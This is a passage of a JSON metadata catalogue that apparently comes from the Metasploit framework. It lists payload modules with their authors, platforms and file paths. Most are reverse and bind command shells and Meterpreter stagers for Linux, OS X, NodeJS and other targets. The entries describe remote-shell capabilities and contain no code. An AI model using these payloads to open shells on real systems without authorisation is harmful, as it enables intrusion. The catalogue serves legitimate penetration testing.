"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/metsvc_bind_tcp": {
"name": "Linux Meterpreter Service, Bind TCP",
"full_name": "payload/linux/x86/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/metsvc_reverse_tcp": {
"name": "Linux Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/linux/x86/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/read_file": {
"name": "Linux Read File",
"full_name": "payload/linux/x86/read_file",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hal"
],
"description": "Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/read_file.rb",
"is_install_path": true,
"ref_name": "linux/x86/read_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_ipv6_tcp": {
"name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_ipv6_tcp_uuid": {
"name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_nonx_tcp": {
"name": "Linux Command Shell, Bind TCP Stager",
"full_name": "payload/linux/x86/shell/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_tcp": {
"name": "Linux Command Shell, Bind TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a command shell (staged). Listen for a connection (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_tcp_uuid": {
"name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/find_tag": {
"name": "Linux Command Shell, Find Tag Stager",
"full_name": "payload/linux/x86/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_ipv6_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/linux/x86/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Spawn a command shell (staged). Connect back to attacker over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_nonx_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/reverse_tcp_uuid": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x86/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_ipv6_tcp": {
"name": "Linux Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/linux/x86/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Listen for a connection over IPv6 and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_bind_tcp_random_port": {
"name": "Linux Command Shell, Bind TCP Random Port Inline",
"full_name": "payload/linux/x86/shell_bind_tcp_random_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Geyslan G. Bem <geyslan@gmail.com>"
],
"description": "Listen for a connection on a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_bind_tcp_random_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_find_tag": {
"name": "Linux Command Shell, Find Tag Inline",
"full_name": "payload/linux/x86/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a shell on an established connection (proxy/NAT safe)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell_reverse_tcp_ipv6": {
"name": "Linux Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/linux/x86/shell_reverse_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Matteo Malvica <matteo@malvica.com>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-23 13:38:25 +0000",
"path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell_reverse_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/zarch/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/zarch/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_mainframe/shell_reverse_tcp": {
"name": "Z/OS (MVS) Command Shell, Reverse TCP Inline",
"full_name": "payload/mainframe/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls"
],
"description": "Listen for a connection and spawn a command shell.\n This implementation does not include EBCDIC character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.",
"references": [
],
"platform": "Mainframe",
"arch": "zarch",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "mainframe/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_multi/meterpreter/reverse_http": {
"name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)",
"full_name": "payload/multi/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves"
],
"description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP",
"references": [
],
"platform": "Multi",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/multi/reverse_http.rb",
"is_install_path": true,
"ref_name": "multi/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_multi/meterpreter/reverse_https": {
"name": "Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)",
"full_name": "payload/multi/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves"
],
"description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS",
"references": [
],
"platform": "Multi",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/multi/reverse_https.rb",
"is_install_path": true,
"ref_name": "multi/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_netware/shell/reverse_tcp": {
"name": "NetWare Command Shell, Reverse TCP Stager",
"full_name": "payload/netware/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"toto"
],
"description": "Connect to the NetWare console (staged). Connect back to the attacker",
"references": [
],
"platform": "Netware",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/netware/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "netware/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via nodejs)",
"full_name": "payload/nodejs/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-11 11:09:28 +0000",
"path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via nodejs)",
"full_name": "payload/nodejs/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan",
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_nodejs/shell_reverse_tcp_ssl": {
"name": "Command Shell, Reverse TCP SSL (via nodejs)",
"full_name": "payload/nodejs/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan",
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via nodejs, uses SSL",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "nodejs/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/execute/bind_tcp": {
"name": "OS X Write and Execute Binary, Bind TCP Stager",
"full_name": "payload/osx/armle/execute/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/execute/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/execute/reverse_tcp": {
"name": "OS X Write and Execute Binary, Reverse TCP Stager",
"full_name": "payload/osx/armle/execute/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/execute/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell/bind_tcp": {
"name": "OS X Command Shell, Bind TCP Stager",
"full_name": "payload/osx/armle/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell/reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/armle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell_bind_tcp": {
"name": "Apple iOS Command Shell, Bind TCP Inline",
"full_name": "payload/osx/armle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/shell_reverse_tcp": {
"name": "Apple iOS Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/armle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/armle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/armle/vibrate": {
"name": "Apple iOS iPhone Vibrate",
"full_name": "payload/osx/armle/vibrate",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Causes the iPhone to vibrate; only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.",
"references": [
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/armle/vibrate.rb",
"is_install_path": true,
"ref_name": "osx/armle/vibrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/bind_tcp": {
"name": "OS X Command Shell, Bind TCP Stager",
"full_name": "payload/osx/ppc/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/find_tag": {
"name": "OS X Command Shell, Find Tag Stager",
"full_name": "payload/osx/ppc/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/find_tag.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell/reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/ppc/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell_bind_tcp": {
"name": "OS X Command Shell, Bind TCP Inline",
"full_name": "payload/osx/ppc/shell_bind_tcp",
